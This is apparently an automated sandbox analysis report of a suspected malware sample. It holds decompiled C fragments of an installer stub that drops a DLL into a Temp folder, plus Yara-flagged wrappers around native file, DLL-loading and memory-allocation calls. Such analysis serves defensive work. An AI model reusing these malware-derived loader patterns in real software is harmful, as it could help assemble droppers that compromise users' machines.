                                                                              					goto L8;
                                                                              				} else {
                                                                              					return CharNextA(_t3);
                                                                              				}
                                                                              			}
                                                                              Addresses: 0x00405568 0x0040556f 0x00405572 0x00405577 0x0040558a 0x004055a4 0x00000000 0x004055a4 0x0040558e 0x0040558f 0x00405592 0x00405593 0x0040559b 0x00000000 0x00000000 0x0040559d 0x004055a0 0x00000000 0x00000000 0x00000000 0x004055a0 0x00000000 0x00405580 0x00000000 0x00405581

                                                                              APIs
                                                                              • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 0040556D
                                                                              • CharNextA.USER32(00000000), ref: 00405572
                                                                              • CharNextA.USER32(00000000), ref: 00405581
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: CharNext
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 3213498283-3916508600
                                                                              • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                              • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                                                              • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                              • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 61%
                                                                              			E00401D8E() {
                                                                              				void* __esi;
                                                                              				int _t6;
                                                                              				signed char _t11;
                                                                              				struct HFONT__* _t14;
                                                                              				void* _t18;
                                                                              				void* _t24;
                                                                              				void* _t26;
                                                                              				void* _t28;
                                                                              
                                                                              				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
                                                                              				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
                                                                              				 *0x4093e8 = E00402A7D(3);
                                                                              				_t11 =  *((intOrPtr*)(_t28 - 0x14));
                                                                              				 *0x4093ef = 1;
                                                                              				 *0x4093ec = _t11 & 0x00000001;
                                                                              				 *0x4093ed = _t11 & 0x00000002;
                                                                              				 *0x4093ee = _t11 & 0x00000004;
                                                                              				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
                                                                              				_t14 = CreateFontIndirectA(0x4093d8);
                                                                              				_push(_t14);
                                                                              				_push(_t26);
                                                                              				E0040591D();
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
                                                                              				return 0;
                                                                              			}
                                                                              Addresses: 0x00401d9c 0x00401db5 0x00401dbf 0x00401dc4 0x00401dcf 0x00401dd6 0x00401de8 0x00401dee 0x00401df3 0x00401dfd 0x00402536 0x00401581 0x004028d7 0x00402932 0x0040293e

                                                                              APIs
                                                                              • GetDC.USER32(?), ref: 00401D95
                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                              • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: CapsCreateDeviceFontIndirect
                                                                              • String ID:
                                                                              • API String ID: 3272661963-0
                                                                              • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                              • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                                                              • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                              • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                              				int _t19;
                                                                              				long _t23;
                                                                              
                                                                              				if(_a8 != 0x102) {
                                                                              					__eflags = _a8 - 2;
                                                                              					if(_a8 == 2) {
                                                                              						 *0x40929c =  *0x40929c | 0xffffffff;
                                                                              						__eflags =  *0x40929c;
                                                                              					}
                                                                              					__eflags = _a8 - 0x200;
                                                                              					if(_a8 != 0x200) {
                                                                              						_t23 = _a16;
                                                                              						goto L9;
                                                                              					} else {
                                                                              						_t19 = IsWindowVisible(_a4);
                                                                              						__eflags = _t19;
                                                                              						if(_t19 == 0) {
                                                                              							L12:
                                                                              							_t23 = _a16;
                                                                              							L13:
                                                                              							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
                                                                              						}
                                                                              						_t23 = E00404627(_a4, 1);
                                                                              						_a8 = 0x419;
                                                                              						L9:
                                                                              						__eflags = _a8 - 0x419;
                                                                              						if(_a8 == 0x419) {
                                                                              							__eflags =  *0x40929c - _t23; // 0xffffffff
                                                                              							if(__eflags != 0) {
                                                                              								 *0x40929c = _t23;
                                                                              								E004059BF(0x79f580, 0x7a4000);
                                                                              								E0040591D(0x7a4000, _t23);
                                                                              								E00401410(6);
                                                                              								E004059BF(0x7a4000, 0x79f580);
                                                                              							}
                                                                              						}
                                                                              						goto L13;
                                                                              					}
                                                                              				}
                                                                              				if(_a12 == 0x20) {
                                                                              					E00403DF3(0x413);
                                                                              					return 0;
                                                                              				}
                                                                              				goto L12;
                                                                              			}





                                                                              0x00404cad
                                                                              0x00404cca
                                                                              0x00404cce
                                                                              0x00404cd0
                                                                              0x00404cd0
                                                                              0x00404cd0
                                                                              0x00404cd7
                                                                              0x00404ce3
                                                                              0x00404d03
                                                                              0x00000000
                                                                              0x00404ce5
                                                                              0x00404ce8
                                                                              0x00404cee
                                                                              0x00404cf0
                                                                              0x00404d43
                                                                              0x00404d43
                                                                              0x00404d46
                                                                              0x00000000
                                                                              0x00404d56
                                                                              0x00404cfc
                                                                              0x00404cfe
                                                                              0x00404d06
                                                                              0x00404d06
                                                                              0x00404d09
                                                                              0x00404d0b
                                                                              0x00404d11
                                                                              0x00404d20
                                                                              0x00404d26
                                                                              0x00404d2d
                                                                              0x00404d34
                                                                              0x00404d3b
                                                                              0x00404d40
                                                                              0x00404d11
                                                                              0x00000000
                                                                              0x00404d09
                                                                              0x00404ce3
                                                                              0x00404cb3
                                                                              0x00404cbe
                                                                              0x00000000
                                                                              0x00404cc3
                                                                              0x00000000

                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00404CE8
                                                                              • CallWindowProcA.USER32 ref: 00404D56
                                                                                • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                              • String ID:
                                                                              • API String ID: 3748168415-3916222277
                                                                              • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                              • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
                                                                              • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
                                                                              • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                              				int _t5;
                                                                              				long _t7;
                                                                              				struct _OVERLAPPED* _t11;
                                                                              				intOrPtr* _t15;
                                                                              				void* _t17;
                                                                              				int _t21;
                                                                              
                                                                              				_t15 = __esi;
                                                                              				_t11 = __ebx;
                                                                              				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                                              					_t7 = lstrlenA(E00402A9A(0x11));
                                                                              				} else {
                                                                              					E00402A7D(1);
                                                                              					 *0x40a018 = __al;
                                                                              				}
                                                                              				if( *_t15 == _t11) {
                                                                              					L8:
                                                                              					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                              				} else {
                                                                              					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll", _t7, _t17 + 8, _t11);
                                                                              					_t21 = _t5;
                                                                              					if(_t21 == 0) {
                                                                              						goto L8;
                                                                              					}
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
                                                                              • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll,00000000,?,?,00000000,00000011), ref: 00402579
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll, xrefs: 00402548, 0040256D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: FileWritelstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsvE792.tmp\6oxdti6l9qd.dll
                                                                              • API String ID: 427699356-483980473
                                                                              • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                              • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
                                                                              • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
                                                                              • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00405513(char* _a4) {
                                                                              				char* _t3;
                                                                              				char* _t4;
                                                                              
                                                                              				_t4 = _a4;
                                                                              				_t3 =  &(_t4[lstrlenA(_t4)]);
                                                                              				while( *_t3 != 0x5c) {
                                                                              					_t3 = CharPrevA(_t4, _t3);
                                                                              					if(_t3 > _t4) {
                                                                              						continue;
                                                                              					}
                                                                              					break;
                                                                              				}
                                                                              				 *_t3 =  *_t3 & 0x00000000;
                                                                              				return _t3;
                                                                              			}

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
                                                                              • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: CharPrevlstrlen
                                                                              • String ID: C:\Users\user\Desktop
                                                                              • API String ID: 2709904686-1669384263
                                                                              • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                              • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
                                                                              • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
                                                                              • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00405624(CHAR* _a4, CHAR* _a8) {
                                                                              				int _t10;
                                                                              				int _t15;
                                                                              				CHAR* _t16;
                                                                              
                                                                              				_t15 = lstrlenA(_a8);
                                                                              				_t16 = _a4;
                                                                              				while(lstrlenA(_t16) >= _t15) {
                                                                              					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                              					_t10 = lstrcmpiA(_t16, _a8);
                                                                              					if(_t10 == 0) {
                                                                              						return _t16;
                                                                              					}
                                                                              					_t16 = CharNextA(_t16);
                                                                              				}
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                              • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
                                                                              • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 190613189-0
                                                                              • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                              • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
                                                                              • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
                                                                              • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Executed Functions

                                                                              APIs
                                                                              • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID: B=A$B=A
                                                                              • API String ID: 2738559852-2767357659
                                                                              • Opcode ID: 6f84ba5e72c32351965744c8ec25ff91069dc3cc27ef8587f5d03ee881435c9b
                                                                              • Instruction ID: ea36dd2d862871e1a50bc0eca0770c179a9c70d80a8a2cef11778b0c78b76812
                                                                              • Opcode Fuzzy Hash: 6f84ba5e72c32351965744c8ec25ff91069dc3cc27ef8587f5d03ee881435c9b
                                                                              • Instruction Fuzzy Hash: 70F0ECB6200504AFCB04DF99DC81EEB77BAFF8C354F058259BA1DD7241D630E8518BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 37%
                                                                              			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                              				void* _t18;
                                                                              				void* _t27;
                                                                              				intOrPtr* _t28;
                                                                              
                                                                              				_t13 = _a4;
                                                                              				_t28 = _a4 + 0xc48;
                                                                              				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                              				_t6 =  &_a32; // 0x413d42
                                                                              				_t12 =  &_a8; // 0x413d42
                                                                              				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                              				return _t18;
                                                                              			}

                                                                              APIs
                                                                              • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID: B=A$B=A
                                                                              • API String ID: 2738559852-2767357659
                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                              • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                              • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                              				char* _v8;
                                                                              				struct _EXCEPTION_RECORD _v12;
                                                                              				struct _OBJDIR_INFORMATION _v16;
                                                                              				char _v536;
                                                                              				void* _t15;
                                                                              				struct _OBJDIR_INFORMATION _t17;
                                                                              				struct _OBJDIR_INFORMATION _t18;
                                                                              				void* _t30;
                                                                              				void* _t31;
                                                                              				void* _t32;
                                                                              
                                                                              				_v8 =  &_v536;
                                                                              				_t15 = E0041AB40( &_v12, 0x104, _a8);
                                                                              				_t31 = _t30 + 0xc;
                                                                              				if(_t15 != 0) {
                                                                              					_t17 = E0041AF60(__eflags, _v8);
                                                                              					_t32 = _t31 + 4;
                                                                              					__eflags = _t17;
                                                                              					if(_t17 != 0) {
                                                                              						E0041B1E0( &_v12, 0);
                                                                              						_t32 = _t32 + 8;
                                                                              					}
                                                                              					_t18 = E004192F0(_v8);
                                                                              					_v16 = _t18;
                                                                              					__eflags = _t18;
                                                                              					if(_t18 == 0) {
                                                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                              						return _v16;
                                                                              					}
                                                                              					return _t18;
                                                                              				} else {
                                                                              					return _t15;
                                                                              				}
                                                                              			}

                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                              • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                              • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                              				long _t21;
                                                                              				void* _t31;
                                                                              
                                                                              				_t3 = _a4 + 0xc40; // 0xc40
                                                                              				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                              				return _t21;
                                                                              			}

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                              • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                              • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 64%
                                                                              			E0041838B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                              				long _t14;
                                                                              				void* _t21;
                                                                              
                                                                              				asm("sbb al, 0xab");
                                                                              				asm("fisubr dword [edx-0x1374aaac]");
                                                                              				_t10 = _a4;
                                                                              				_t3 = _t10 + 0xc60; // 0xca0
                                                                              				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                              				return _t14;
                                                                              			}

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: e925053f86c05f5fb4b0b2fb8cc6689b729dd8d10ef6bb8a80f2b56ebb5274c5
                                                                              • Instruction ID: 73b80116c2f0aa312eb484c462c33686b2ba2de7f18ec796e0b79ebf6884a435
                                                                              • Opcode Fuzzy Hash: e925053f86c05f5fb4b0b2fb8cc6689b729dd8d10ef6bb8a80f2b56ebb5274c5
                                                                              • Instruction Fuzzy Hash: B8F01CB6201108AFDB54DF99DC81EE777A9EF88354F118549FE0897241C630E811CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 100%
                                                                              			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                              				long _t14;
                                                                              				void* _t21;
                                                                              
                                                                              				_t3 = _a4 + 0xc60; // 0xca0
                                                                              				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                              				return _t14;
                                                                              			}

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                              • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                              • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                                              Uniqueness

